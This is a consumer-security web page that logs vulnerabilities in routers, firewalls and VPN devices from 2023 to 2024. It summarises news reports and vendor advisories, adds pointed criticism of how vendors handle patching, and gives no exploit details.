Router Security | Router Bugs Flaws Hacks and Vulnerabilities |
Website by Michael Horowitz |
If you care about the security of your router, and you should, it is best to avoid consumer grade routers. On the whole, the software in these routers is buggy as heck. Below is what I base this opinion on.
This page documents the existence of bugs in routers. Starting April 2018, I also track routers in the news which details the exploitation of router flaws.
You may be thinking that all software is buggy, but router software is probably worse. One reason for this is your ISP, which may have configured the router/gateway in an insecure way, either on purpose, to allow spying, or out of laziness or incompetence. Another reason is cost: router software is developed as cheaply as possible.
BIG BUGS: A number of flaws stand out. The port 32764 issue from January 2014 and April 2014 for example. A router backdoor was exposed, then instead of being removed, was just better hidden. Another flaw not to be missed is the Misfortune Cookie from December 2014. Then, of course, there is WPS, the electronic equivalent of a "hack me" sign on your back. Other huge flaws involved UPnP being exposed to the Internet and file sharing on a USB port.
THE US GOVERNMENT: In January 2017, the FTC accused D-Link of leaving its routers and webcam devices vulnerable to hackers. A lawsuit alleged that D-Link "failed to take reasonable steps to protect their routers and IP cameras from widely known and reasonably foreseeable risks of unauthorized access." D-Link was also accused of misleading the public about the security of their devices. D-Link denied they did anything bad. More on the Router News page.
This page has bugs from 2023, 2022, 2021, 2020 and 2019. Older bugs, from 2018 through 2012, are available at the bottom of this page. To see all the bugs on one B_I_G web page (makes it easy to find all the issues for any one manufacturer) click this button ==>
DONE. All the bugs are now displayed belowDECEMBER 2024
Six buggy Asus routers say bad things about Asus
ASUS Router Improper Input Validation
by Asus December 3, 2024
Six Asus routers are buggy the RT-AX55, RT-AX56U, RT-AX56U_V2, RT-AX57, RT-AX58U and RT-AX58U_V2. Ho hum, but ... the bug is improper input validation - again. The context here is that just last month (Nov. 2024) Asus issued bug fixes for many of their routers, and one of the bugs they fixed was improper input validation. For exmaple, the AX55, AX57 and AX58 all had new firmware issued just last month. It seems that Asus did a poor job fixing their bugs. Not to mention the large number of bugs they fixed in June 2024, not all that long ago. This time, there is just one bug being fixed, CVE-2024-11985. Last month, Asus danced around the issue of how many bugs they were fixing.
Zyxel bugs: pros and cons
Zyxel security advisory for buffer overflow and post-authentication command injection vulnerabilities in some 4G LTE/5G NR CPE, DSL/Ethernet CPE, fiber ONTs, and WiFi extenders
by Zyxel December 3, 2024
There are three bugs in Zyxel software. Yawn. The bugs affect many different types of Zyxel devices. There are fixes. Yawn. What impresses me, however, is how thorough the company was in researching these bugs. Their writeup has three long lists of vulnerable devices, one for each bug. Typically a bug is reported in one device, that device is fixed and 99 other devices that probably have the same bug are ignored. Not here. The down side, however, is getting the patched software. Zyxel says "For end-users who purchased your Zyxel device yourself, please contact your local Zyxel support team for the new firmware file to ensure optimal protection, or visit Zyxel's Community for further assistance." They link to community.zyxel.com/en which is a generic support site with nothing specific about firmware downloads.
NOVEMBER 2024
Still more critical D-Link router bugs
D-Link tells users to trash old VPN routers over bug too
dangerous to identify
by Connor Jones of The Register November 20, 2024
This sure looks like the story below from November 13th, but no. This too is a serious remote code execution (RCE) vulnerability. Here too, the routers are
too old to bother fixing and should be replaced. But this is different: "Most of the details about the bug are being kept under wraps given the potential for
wide exploitation. Unauthenticated RCE issues are essentially as bad as vulnerabilities get ..." D-Link is offering 20 percent off the price of a new D-Link
router. Not a good move, best to avoid D-Link. These routers are vulnerable to this bug and went EoL in May 2024: DSR-150, DSR-150N,
DSR-250, DSR-250N. These routers are also vulnerable to this bug, but they went EoL 9 years ago: DSR-500N and DSR-1000N.
Fortinet fails to fix buggy Windows VPN software
Chinese hackers exploit Fortinet VPN zero-day to steal credentials
by Bill Toulas of Bleeping Computer November 18, 2024
There is a bug in the Fortinet Windows VPN client software that allows bad guys to steal credentials after the victim has authenticated to the VPN server. A new report from
Volexity says that they discovered and reported the bug earlier this summer. Here it is November and Fortinet still has not fixed the vulnerability. Volexity says that the FortiClient software fails to clear sensitive information (username, password, VPN gateway, and port) from its memory. How Fortinet failed to fix their software for so long is really hard to imagine.
Palo Alto Network devices have still more bugs
CISA warns of more Palo Alto Networks bugs exploited in attacks
by Sergiu Gatlan of Bleeping Computer November 14, 2024
Note the word "more" in the headline. These bugs are currently being exploited by bad guys. It is more of the usual: one bug lets bad guys run arbitrary
OS commands as root, exposing usernames, cleartext passwords, device configurations, and device API keys of PAN-OS firewalls. A second bug provides access to
password hashes, usernames, device configurations, and device API keys) and also lets the bad guys create or read arbitrary files.
D-Link ruins the world, yet again
Today It's 60K EoL D-Link Routers
That Aren't Getting Patches
by Jeremy Hellstrom of PC Perspective November 13, 2024
Quoting: "No, It's Not A Repeat. Last Week Was 60K NAS Devices. Today in reasons to reconsider purchasing or recommending D-Link products, there are almost 60,000 D-Link DSL6740C routers that hit EoL at the beginning of this year with critical security flaws that will not be patched ... the devices were only ever sold overseas; Taiwan having the most devices ... The vulnerabilities include a 9.8 that allows an attacker to change the password of an existing account on the router, thus granting themselves as much access as they could ever want while simultaneously locking the owner out of their router. There are two more ... It is unreasonable to expect companies to support their devices forever, however with devices that can cause serious havoc across the globe we need something better than a shrug from the manufacturers."
Security updates to most every Asus router
New firmware Update for Enhanced security
by Asus November 4, 2024
Intro: Asus puts all their security problems on one big web page. Their routers (at least most of them) do not self-update, so the web page nags you to do the dirty work. It is also up to you to check for updates, they won't bother emailing you. The security changes are described very vaguely, nothing detailed. They say: "ASUS has released several firmware updates to enhance security" which means many of their routers are buggy. They say "Strengthened input validation and data processing workflows". No one knows what a data processing workflow is. And not validating your inputs is just lazy stupid programming. And "Improved web rendering engine, enhancing browsing experience and security." Again, weasle words looking to sound nice but most likely covering up something ugly. And "Enhanced security of system command processing to guard against potential malicious operations." No doubt, this is a biggy. There's more but you get the point - do a manual update. How many different bugs were fixed? None of your business.
OCTOBER 2024
FortiJump bug in Fortinet FortiManager
Burning Zero Days: FortiJump FortiManager vulnerability used by nation state in espionage via MSPs
by Kevin Beaumont October 23, 2024
There is widespread exploitation of FortiNet products using a zero day and there is not even a lousy CVE (one was issued two days after this article was written). The bug has been under widespread exploitation for a while. By their clamming up, Beaumont argues that the only ones being protected is FortiGate themselves, and any governments that don't want to be embarrassed. FortiManager is a product that manages a bunch of FortiGate firewalls. The FortiManager has a Device Manager that uses FGFM to create add new devices and install policy packages and device settings. Quoting: "FortiNet made a number of errors in how this is implemented. For example, out of the box, by default, FortiManager allows any device, even with an unknown serial number, to register with FortiManager automatically and become a managed device ... Once registered, there’s a vulnerability which allows remote code execution on the FortiManager itself via the rogue FortiGate connection. From the FortiManager, you can then manage the legit downstream FortiGate firewalls, view config files, take credentials and alter configurations." Very bad. Worse is that Managed Service Providers often use FortiManager, so when they get compromised so too can all their customers get hacked. Beaumont claims that a state-sponsored group is behind the attacks on this bug. Mandiant says the bug has been exploited since June. Censys says there are over 4,000 FortiManager admin portals exposed to the Internet.
Fortinet Clams up
FortiGate admins report active exploitation 0-day. Vendor isn’t talking.
by Dan Goodin for Ars Technica October 22, 2024
Some mistakes you just can't make. Being aware of a new critical security flaw and saying nothing to your customers, is one of those mistakes. Quoting the article:
"Fortinet, a maker of network security software, has kept a critical vulnerability under wraps for more than a week amid reports that attackers are using it to execute malicious code on servers used by sensitive customer organizations. Fortinet representatives didn’t respond to emailed questions and have yet to release any sort of public advisory detailing the vulnerability or the specific software that’s affected. The lack of transparency is consistent with previous zero-days that have been exploited against Fortinet customers. Vulnerability allowing remote code execution has been discussed since at least 9 days ago."
More Big Boys Have Bugs
CISA says critical Fortinet RCE flaw now exploited in attacks
by Sergiu Gatlan of Bleeping Computer October 9, 2024
Bad guys have been found actively exploiting a critical FortiOS remote code execution bug. Think Little Bobby Tables and not sanitizing your input
The bug lets bad guys execute commands or code on vulnerable devices in an attack that is low-complexity and does not require user interaction.
Fortinet disclosed and patched this security flaw in February 2024. Yet, the US Government just got around to mandating that the fix be installed by
October 30, 2024. Eight months to fix a critical bug. Why not just hang a WE USE FORTINET - HACK US poster on every government building?
The Big Boys Have Bugs Too
Palo Alto Networks warns of firewall hijack bugs with public exploit
by Sergiu Gatlan of Bleeping Computer October 9, 2024
What does it say when a device purchased to increase security, is itself buggy? So buggy, that it lowers your security. There are 5 bugs, all have patches
available. I can't judge 4 of the bugs, but the 5th is shameful, they put passwords in logs in clear text. Not what a security focused device should do.
After installing patched software, Palo Alto users are advised to change all userids and passwords. Ugh.
For context, back in April 2024, Palo Alto was seriously vulnerable - they had to release a fix for a maximum-severity zero-day bug that
bad guys were found exploiting.
14 (not a typo, really 14) bugs in DrayTek routers
DrayTek fixed critical flaws in over 700,000 exposed routers
by Bill Toulas of Bleeping Computer October 2, 2024
Where do we begin? At least the bugs have been patched. The bugs exist in 24 router models, 11 of which are End-of-Life. Due to the severity of the bugs, DrayTek has made fixes available, even for the 11 non-supported models. They are not D-Link. The most severe bug has a critical rating of 10 out of 10, which is to say: brutal (really very critical). Five of the flaws are said to require immediate attention. Looking at it another way, 2 are critical severity, 9 high severity, and 3 medium severity. Most of DrayTek recommends that the web interface to their routers only be available on the LAN side. Yet, the company that found these bugs, Verdere Labs found over 704,000 DrayTek Vigor routers exposing their web interface to the internet. No mention was made of whether there is a mobile app for administering DrayTek routers. I looked at the Release Notes for some of the fixed firmwares and they said little more than "better security". That's disappointing.
This article is based on a report by Vedere Labs, which seems to be a sub-sidiary of Forescout Research. A link to the report is below along with some pretty damning quotes. On the up side, they do say that DrayTek responded promptly to their bug reports.
SEPTEMBER 2024
Disgraceful D-Link bugs
D-Link fixes critical RCE, hardcoded password flaws in WiFi 6 routers
by Bill Toulas of Bleeping Computer
September 14, 2024
There are honest mistakes and then there are hard coded passwords which are inexcusable, disgraceful mistakes. D-Link disclosed and fixed five bugs in three of their routers: the COVR-X1870, the DIR-X4860 and the DIR-X5460. Three bugs are rated critical. To me, the worst of the five is that the Telnet service is enabled when the WAN port is active, allowing remote access with hard-coded passwords. The buggy routers are popular with consumers, especially among those looking for high-end WiFi 6 and mesh networking. It took D-Link over 3 months to fix the bugs. Seems like a long time. The article did not say if any of these bugs are the same as those in the DIR-846W (see below).
Throw away the D-Link DIR-846W router
D-Link says it is not fixing four RCE flaws in DIR-846W routers
by Bill Toulas of Bleeping Computer September 3, 2024
Yet another instance of router flaws that will not be fixed. And, not said in the article, is whether any other D-Link routers
suffer from the same bugs. Chances are they do. As to the details: there are four remote code execution flaws in all versions of the D-Link DIR-846W router and the
bugs will not be fixed. Three of the bugs are rated critical and do not require authentication. DIR-846W routers were sold primarily outside the U.S. The model is still sold in some markets, including Latin America.
Zyxel bugs
Security Advisories from Zyxel
Lots of Zyxel bugs in September.
On the 3rd, they issued a security advisory for OS command injection vulnerability in APs and security router devices. Also on the 3rd, they issued a security advisory for multiple vulnerabilities in firewalls. And still on the 3rd, another security advisory for a buffer overflow bug in some 5G NR CPE, DSL/Ethernet CPE, fiber ONT, WiFi extender, and security router devices. Then, a week later, on the 10th a security advisory for an insufficient entropy bug with web authentication tokens in their GS1900 series switches. Also on the 10th, an advisory for an OS command injection bug in their NAS products.
AUGUST 2024
Critical Sonicwall bug
SonicOS Improper Access Control Vulnerability
a Security Advisory from SonicWall August 22, 2024
Quoting: "An improper access control vulnerability has been identified in the SonicWall SonicOS management access and SSLVPN, potentially leading to unauthorized resource access and ... causing the firewall to crash." This means, in simple terms, bad guys can get in without knowing any passwords. The bug is being exploited in the wild, as of early September 2024. A patch was released at the end of August.
JULY 2024
Cisco, yet again
Vulnerability in Cisco Smart Software Manager lets attackers change any user password
by Dan Goodin of Ars Technica July 17, 2024
The severity of the bug, tracked as CVE-2024-20419, is rated 10, out of 10. This is as rare as the Hope Diamond. The bug is due to a buggy implementation of the password-change process. Bad guys just need to send bad HTTP requests to a vulnerable device. A successful exploit allows the bad guy to access the web interface or the API with the privileges of the compromised user. There are no workarounds. Ars readers made many comments to the article.
Sonicwall accused of hiding a security bug
Sonicwall hidden security bug
by
Catalin Cimpanu in the Risky Business security newsletter July 17, 2024
Yet another example of how high end networking devices do not insure good security. Quoting from the newsletter: "Sonicwall hidden security bug: Vulnerability disclosure platform SSD has accused Sonicwall of secretly patching a major security flaw in its SMA100 security appliances. SSD says SMA100 appliances contained a vulnerability in a feature called Classic Mode that could have been abused for RCE attacks on authenticated users. The security firm claims Sonicwall removed Classic Mode from SMA100 devices last November without telling users of the possible threat. Sonicwall didn't include the removal in patch notes, didn't assign a CVE for the bug, and did not warn customers still using older firmware. SSD has now released a write-up and exploit code."
JUNE 2024
Critical bug in Juniper routers
Juniper Networks flings out emergency patches for perfect 10 router
vulnerability
by Connor Jones of The Register July 1, 2024
Juniper Networks devices are high end. Very high. A critical bug in some Juniper devices forced the company to issue emergency patches last week. The bug, an authentication bypass issue (CVE-2024-2973) was rated 10 out of 10 which is very rare. The buggy devices are the Juniper Smart Session Router, their Session Smart Conductor management platform, and WAN Assurance Routers. Only devices using high-availability redundant configurations are vulnerable. This is one indication of how high end Juniper products are - they actually researched the problem and reported on which of their devices are vulnerable and which are not. Very different from consumer routers.
Bug in D-Link router illustrates much about consumer routers
Hackers exploit critical D-Link DIR-859 router flaw to steal passwords
by Bill Toulas of Bleeping Computer June 29, 2024
The D-Link DIR-859 router is old and has been retired (End of Life or EoL) by the company. It also has a critical bug that lets bad guys get total control of the router. The points that this illustrates about consumer routers:
A flood of bugs in Asus routers
High-severity vulnerabilities affect a wide range of Asus router models
by Dan Goodin of Ars Technica June 17, 2024
Yikes. Multiple critical vulnerabilities that allow bad guys to remotely take control of many Asus router models. No authentication needed. No mistake by the router owner or users needed. One bug, (CVE-2024-3080) is an authentication bypass flaw that lets remote attackers log into a device. Routers with this bug are the Asus XT8, XT8_V2, RT-AX88U, RT-AX58U, RT-AX57, RT-AC86U, RT-AC68U. These same models also suffer from a second bug. A third bug allows remote hackers to execute commands with no user authentication. That bug affects these models: DSL-N12U_C1, DSL-N12U_D1, DSL-N14U, DSL-N14U_B1, DSL-N16, DSL-N17U, DSL-N55U_C1, DSL-N55U_D1, DSL-N66U,
DSL-AC51/DSL-AC750, DSL-AC52U, DSL-AC55U, DSL-AC56U. There are fixes for these models. However, the same third bug is in these models which are too old and will not be fixed: DSL-N10_C1, DSL-N10_D1, DSL-N10P_C1, DSL-N12E_C1, DSL-N16P, DSL-N16U, DSL-AC52 and DSL-AC55. You might think if you owned an Asus router and registered with them, that they would tell you about critical updates like this by email. But, no. Some of these models can auto-update but there are complaints about the Asus auto updating system. Ars reader comments show some very unhappy customers who tried to install the patches. Three critical bugs. At some point, you have to wonder if maybe Asus is just not very good at this whole router thing.
Proving this theory is the article below from Bleeping Computer. It adds that ASUS has also updated Download Master, a utility that enables you to download files directly to a USB storage device connected to the router. It supports torrent, HTTP and FTP with the last two being miserably insecure. The update fixes five medium to high-severity bugs.
So, that's 8 recent bugs, if you are counting.
MAY 2024
TP-Link router with a HUGE bug
Security Advisory: Remote Command Execution on TP-Link Archer C5400X
by OneKey May 27, 2024
This a huge bug, the severity was rated 10 out of 10, which is pretty rare. The router exposes a network listener on TCP ports 8888, 8889, and 8890. This listener software is vulnerable to command injection and buffer overflows. A bad guy that exploits this flaw gets total control of the router. Game over. What is not addressed by either OneKey, the company that found the bug or by TP-Link is whether this is the only router with the bug. TP-Link makes dozens of different routers. This is the typical pattern with consumer routers, a security person/company tests one model, finds a bug, the company fixes the bug in that one model and no one bothers to check any other models running similar firmware. On the page on this site about dealing with a new router, I suggest connecting it to an existing router and running nmap or another port scan product on the WAN port of the router. This would have exposed the open TCP ports. No consumer router should have any open ports out-of-the-box.
APRIL 2024
None of your business
Asus Product Security Advisory
by Asus April 12, 2024
Just like the TP-Link bugs below, this too, illustrates what is wrong with consumer routers. The Asus Product Security Advisory page shows that security related bug fixes were issued for these models: EBM68, EBR63 and RT-AX57 Go. Period. That's all it says. What was the bug? How serious is it? Is there a work-around? Were there multiple bugs? None of your [expletive deleted] business. Asus customers are not entitled to this information.
Bugs in TP-Link routers and APs
Vulnerability in some TP-Link routers could lead to factory reset
by
Jonathan Munshaw of Cisco Talos April 10, 2024
These bugs illustrate everything wrong with consumer routers. For one thing, which models are buggy? Talos can not test every TP-Link device, they test a few and find bugs. What about the others? Talos can't know and TP-Link says nothing, issuing fixes for the few tested models. Also, TP-Link says nothing about any of this on their Security Advisory page. This is quite different from the March 2024 bug in Netgear routers shown below. There, Netgear was very clear about the affected models. Talos found four bugs and told TP-Link on Dec 11, 2023. Fixes were issued April 3, 2024. Too long? Matter of opinion, judge for yourself.
MARCH 2024
Bug in 3 Netgear routers
Netgear RAX30 JSON Parsing getblockschedule() stack-based buffer
overflow vulnerability
by Cisco Talos March 7, 2024
"A stack-based buffer overflow vulnerability exists in the JSON Parsing getblockschedule() functionality of Netgear RAX30 ... A specially crafted HTTP request can lead to code execution. An attacker can make an authenticated HTTP request to trigger this vulnerability." Discovered by Michael Gentile of Cisco Talos. Not the worst bug as the bad guy has to be on your LAN to exploit it. Netgear is clear about which models are buggy: RAX28, RAX29 and RAX30. Talos told Netgear about the bug Dec 6, 2023. Netgear issued a fix March 6, 2024.
FEBRUARY 2024
Lots of critical Fortinet bugs
Fortinet's week to forget: Critical vulns,
disclosure screw-ups, and that toothbrush DDoS attack claim
by Connor Jones of The Register February 9, 2024
TLDR: you pay for more security, you end up less secure. And, Fortinet seems like a Mickey Mouse company.
There is "yet another critical security vulnerability in FortiOS". This one is CVE-24-21762 and it is rated 9.6 for severity. The bug impacts unsupported versions, of FortiOS and the company will not issue fixes for those versions, forcing customers to upgrade or switch vendors. This critical bug comes a few days after the disclosure of two other critical FortiOS bugs on February 6. The earlier disclosure "... immediately attracted our attention since it's not too often we hear about two maximum severity bugs being disclosed on the same day, impacting a major security product like FortiSIEM. However, that's what happened on Tuesday with both CVE-2024-23108 and CVE-2024-23109 appearing in the National Vulnerability Database (NVD)."
On top of the three critical bugs, the way Fortinet handled things was shameful. The Register called them "unprofessional". In regard to the first two bugs, the article says "Firstly, Fortinet backtracked and said these weren't vulnerabilities at all, instead explaining that they were issued in error and were duplicates of the single vulnerability mentioned in the aforementioned October advisory - CVE-2023-34992. Then, within hours of this, the company backtracked again saying that yes, actually, these are two new vulnerabilities - two bypasses for October's CVE-2023-34992. This came after the researcher credited with the discoveries published the email from Fortinet confirming the findings were indeed actual vulnerabilities".
DECEMBER 2023
21 Bugs in Sierra Wireless routers
Sierra: 21 vulnerabilities impact critical infrastructure routers
by Bill Toulas of Bleeping Computer December 6, 2023
"A set of 21 newly discovered vulnerabilities impact Sierra OT/IoT routers and threaten critical infrastructure with remote code execution, unauthorized access, cross-site scripting, authentication bypass, and denial of service attacks." Catch that? 21 bugs. 21. The flaws were discovered by Forescout Vedere Labs. They affect Sierra Wireless AirLink cellular routers and open-source components like TinyXML and OpenNDS. TinyXML is EoL, so no fix there. The other bugs have available fixes. One bug is considered critical, eight of them are high severity score, and a dozen were considered a medium risk. Forescout found over 86,000 AirLink routers exposed online in organizations engaged in power distribution, vehicle tracking, waste management, and national health services.
OCTOBER 2023
Chinese hackers must love Cisco. Cisco customers, not so much
'Cisco buried the lede.' Over 10,000 network devices backdoored through unpatched zero day
by Dan Goodin for Ars Technica October 17, 2023
Yet another Cisco shit show. Their devices are being hacked left and right. It's a new bug and there was no fix at the time this was publicly disclosed. The bug is CVE-2023-20198 and it is rated 10 out of 10, the worst possible case. The bug is relatively easy to exploit. The bug is in the Web User Interface of their IOS XE software. The number of already hacked devices came from security firm VulnCheck and they had not finished their scan when the article was written. About a week after the s... hit the fan, it was disclosed that over 40,000 Cisco devices had been hacked. The bug lets a bad guy create an admin account on the vulnerable device. Cisco released a fix on Oct 23, 2023.
Buggy software on high end hardware
Juniper Networks Patches Over 30 Vulnerabilities in Junos OS
by Ionut Arghire of Security Week October 13, 2023
Juniper Networks patches over 30 vulnerabilities in Junos OS and Junos OS Evolved, including nine high-severity bugs. This is bad enough, but it was only two months ago, that Juniper patched another clump of severe bugs. My writeup for those bugs is below, filed under September. They are quite the bug factory.
Cisco makes the same huge mistake over and over
Cisco Can’t Stop Using Hard-Coded Passwords
by Bruce Schneier October 11, 2023
Quoting: "This is not the first time Cisco products have had hard-coded passwords made public. You’d think it would learn."
SEPTEMBER 2023
Patched Juniper bugs being ignored by nerds
Thousands of Juniper Junos firewalls still open to hijacks, exploit code available to
all
by Jessica Lyons Hardcastle of The Register September 18, 2023
On August 17th of this year, Juniper revealed and addressed five bugs that appear in all versions of Junos OS on SRX firewalls and EX Series switches. Then, on August 25, watchTowr published a proof of concept exploit for two of the bugs, used together, that allowed unauthenticated bad guys to get remote code execution by uploading two files. Then, on September 18th, VulnCheck CTO Jacob Baines published a report claiming that just one of the bugs, all by itself, was sufficient for remote bad guys to totally hack a buggy device. VulnCheck has also released a scanning tool to identify firewalls vulnerable to this bug. VulnCheck believes the majority of affected internet-facing firewalls (79 percent or about 15,000 devices) still are not patched. Quoting: Juniper did not respond to The Register's inquiries about the new RCE exploit, the confusing CVE descriptions, or the number of still-vulnerable devices.
Huge security flaws in 3 Asus routers
ASUS routers vulnerable to critical remote code execution flaws
by Bill Toulas of Bleeping Computer September 5, 2023
Lazy programming strikes again. There is no excuse for this crap other than second (or third) rate programmers. The Asus RT-AX55, RT-AX56U_V2 and RT-AC86U routers all have critical security bugs that are as bad as bad gets. These are high end models favored by gamers for their performance. The bugs are known as format string errors. That is polite talk. In simpler terms user input was not sanitized. Little Bobby Tables. The bugs can be exploited remotely and without authentication, potentially allowing remote code execution. Bug fixes have been trickling out over the last couple months.
JULY 2023
Mikrotik is clearly not trustworthy. Their poor security practices make a bug much worse
Super Admin elevation bug puts 900,000 MikroTik devices at risk
by Bill Toulas of Bleeping Computer of July 25, 2023
A bug, known as CVE-2023-30799, allows bad guys with an existing admin account to elevate their privileges to "super-admin" a level that was never intended to be given to anyone. This level of access was intended for use only by certain parts of the router operating system. Although the requirement to first have an admin account sounds like a high bar to clear, the article explains that due to generally miserable security practices, it is not a very high bar. First off, the Mikrotik RouterOS system does not prevent password brute-force attacks. And, it comes with a default admin userid, as do many routers. To me, the biggest disgrace is that until October 2021 the default admin password was an empty string. Clearly Mikrotik cares nothing about security. In contrast, Peplink forces you to change the router password immediately after the default one is used the first time. And, RouterOS will accept any password, there is no such thing as too short a password. The bug was first disclosed to Mikrotik in June 2022 and they fixed it 4 months later in the stable version of RouterOS. The flaw was found by Margin Research employees, Ian Dupont and Harrison Green. However, Mikrotik did not fix the bug in the long-term version of the OS until just now (July 2023). Why the delay? According to VulnCheck, the long-term version of the OS was only fixed after they nagged Mikrotik about it. Oopsie. One estimate is that 474,000 Mikrotik routers expose their web interface to the Internet and thus are vulnerable.
JUNE 2023
Fortinet again
Fortinet fixes critical RCE flaw in Fortigate SSL-VPN devices, patch now
by Lawrence Abrams of Bleeping Computer June 11, 2023
Fortinet devices are popular, making them a prime target for attacks. This bug is estimated to impact over 500,000 devices. Yikes. Fortinet is known to push out security patches prior to disclosing critical vulnerabilities to give customers time to update their devices before threat actors can reverse engineer the patches. They seem to have done so, fixes are available for an undisclosed, critical pre-authentication remote code execution vulnerability known as CVE-2023-27997 (Fortinet calls it FG-IR-23-097). The bug is a heap-based buffer overflow in FortiOS and FortiProxy SSL-VPN. It can let unauthenticated bad guys run software on the box (RCE). One article said the bug was discovered during a code audit of the SSL-VPN module following attacks against government organizations exploiting the recent FortiOS bug known as CVE-2022-42475. Another article said it was discovered by Lexfo Security researchers Charles Fol and Dany Bach.
Update: 300,000+ Fortinet firewalls vulnerable to critical FortiOS RCE bug by Bill Toulas of Bleeping Computer. July 3, 2023. If you thought a critical bug in a critical device would be quickly fixed, you don't know how IT works in 2023. Security company Bishop Fox reported that more than 2 weeks after Fortinet issued their bug fix, most of their devices remain vulnerable. Specifically, Bishop Fox found 153,414 FortiGate firewall boxes had been updated and over 300,000 had not. What could be worse? They also found that many of the exposed FortiGate devices had not received an update for the past eight years. 8 [expletive] years.
Asus fixes NINE security flaws
ASUS urges customers to patch critical router vulnerabilities
by Sergiu Gatlan of Bleeping Computer June 19, 2023
Asus released bug fixes for nine security flaws that affect many different models. Two fixes are rated Critical and six are rated High in severity. One is still being evaluated. The vulnerable models are: GT6, GT-AXE16000, GT-AX11000 PRO, GT-AXE11000, GT-AX6000, GT-AX11000, GS-AX5400, GS-AX3000, XT9, XT8, XT8 V2, RT-AX86U PRO, RT-AX86U, RT-AX86S, RT-AX82U, RT-AX58U, RT-AX3000, TUF-AX6000, TUF-AX5400. That the bugs effect 19 different models is an improvement, and a big one at that. Many reports about router bugs are said to only apply to a single model and I very much doubt that is ever true. Full details from Asus:
Fixed CVE-2023-28702, CVE-2023-28703, CVE-2023-31195, CVE-2022-46871, CVE-2022-38105, CVE-2022-35401, CVE-2018-1160, CVE-2022-38393, CVE-2022-26376
Fixed DoS vulnerabilities in firewall configuration pages.
Fixed DoS vulnerabilities in httpd.
Fixed information disclosure vulnerability.
Fixed null pointer dereference vulnerabilities.
Fixed the cfg server vulnerability.
Fixed the vulnerability in the logmessage function.
Fixed Client DOM Stored XSS
Fixed HTTP response splitting vulnerability
Fixed status page HTML vulnerability.
Fixed HTTP response splitting vulnerability.
Fixed Samba related vulerabilities.
Fixed Open redirect vulnerability.
Fixed token authentication security issues.
Fixed security issues on the status page.
Enabled and supported ECDSA certificates for Let's Encrypt.
Enhanced protection for credentials.
Enhanced protection for OTA firmware updates.
MAY 2023
Still more critical Zyxel bugs
Zyxel warns of critical vulnerabilities in firewall and VPN devices
by Bill Toulas of Bleeping Computer May 25, 2023
Quoting: "Zyxel is warning customers of two critical-severity vulnerabilities in several of its firewall and VPN products that attackers could leverage without authentication. Both security issues are buffer overflows and could allow denial-of-service (DoS) and remote code execution on vulnerable devices." Both bugs are rated 9.8 out of 10 which means they are really really bad. Bug fixes are available. Bugs are CVE-2023-33009 and CVE-2023-33010. A different Zyxel bug, one that had a patch released in April 2023, is being actively exploited by bad guys. That bug affects the same firewall and VPN products as these two.
Still more critical Cisco bugs
Cisco squashes critical bugs in small biz switches
by Jeff Burt of The Register May 18, 2023
Cisco software has more critical bugs than grains of sand on a beach. This time, there are four critical security vulnerabilities in several of their switches. And, of course, Cisco did not find the bugs on their own, someone else reported them. The flaws are in the web interface and they can be used to run arbitrary code with root privileges. All the bugs have a CVSS severity rating of 9.8 out of 10. As we have many times before with Cisco, the bugs are due to improper validation of requests sent to the web interface. It's like they are not even trying. Or, their programmers are a lazy as lazy gets. Buggy devices: the 250 Series smart switches, 350 Series managed switches, 350X Series and 550X stackable managed switches. Also the Business 250 Series smart switches and Business 350 Series managed switches. The bugs are CVE-2023-20159, CVE-2023-20160, CVE-2023-20161 and CVE-2023-20189. Another thing we have seen before with Cisco: three other buggy switches won't be fixed because they are toooooooooooooooooooo old.
Still another Fortinet bug
A More Complete Exploit for Fortinet CVE-2022-42475
by Carl Livitt and Jon Williams of Bishop Fox May 17, 2023
On this page is a writeup about a bug in Fortinet FortiOS software from March 2023 and another writeup about another bug from October 2022. This is yet another bug.
Quoting: "Recently, there has been some buzz about remotely exploitable vulnerabilities in Fortinet security appliances, especially FortiGate firewalls. This blog focuses on one such bug: CVE-2022-42475, a remotely exploitable heap overflow in the SSL VPN component of FortiGate and FortiProxy appliances. It was discovered in the wild by Fortinet in late 2022 during an investigation into a compromised firewall. " The article is a very detailed look at the bug.
APRIL 2023
Many Many Zyxel bugs
Zyxel Firewall Devices Vulnerable to Remote Code Execution Attacks - Patch Now
by Ravie Lakshmanan of Hacker News April 28, 2023
Zyxel just released three security advisories to fix what looks like nine different bugs in their assorted devices. Each clump of bugs was found a different security company. The first clump is a lone critical security flaw in its firewall devices can be exploited to achieve remote code execution on buggy systems. This affects ATP, USG FLEX, VPN and ZyWALL/USG. The second clump of fixes includes a high-severity post-authentication command injection bug that affects select firewall versiions and permits an authenticated bad guy to execute OS commands remotely. The third clump of fixes includes five high-severity flaws and one medium-severity bug affecting several firewalls and APs. These bugs could result in code execution and cause a denial-of-service. You may also want to scan the rest of this page and site for more references to Zyxel.
One TP-Link router is buggy. Other models? None of your damn business
TP-Link Archer WiFi router flaw exploited by Mirai malware
by Bill Toulas of Bleeping Computer April 25, 2023
"The Mirai malware botnet is actively exploiting a TP-Link Archer A21 (AX1800) WiFi router vulnerability tracked as CVE-2023-1389 to incorporate devices into DDoS (distributed denial of service) swarms. Researchers first abused the flaw during the Pwn2Own Toronto hacking event in December 2022, where two separate hacking teams breached the device using different pathways LAN and WAN side." This is a big time bug, a bad guy can use it to execute arbitrary code in the context of root. Like many bugs, this due the programmers being lazy and not validating user input. It seems the programmers are stupid too, the company first attempted to fix this in February, but the fix was incomplete. Personally, I do not want to use firmware written by lazy stupid people. Adding insult to injury, in their description of the fixed firmware, this is all TP-Link says: "Fixed some security issues." And, the biggest reason not to use a router from TP-Link is their other 23 models of routers. Are they buggy too? No one says. How likely is it that of the many many different router models, only this one has the bug.
Yet another reason to use VLANs
With ICMP magic, you can snoop on vulnerable HiSilicon, Qualcomm-powered Wi-Fi
by Thomas Claburn of The Register April 7, 2023
Sub-heading: WPA stands for will-provide-access, if you can successfully exploit a target's setup
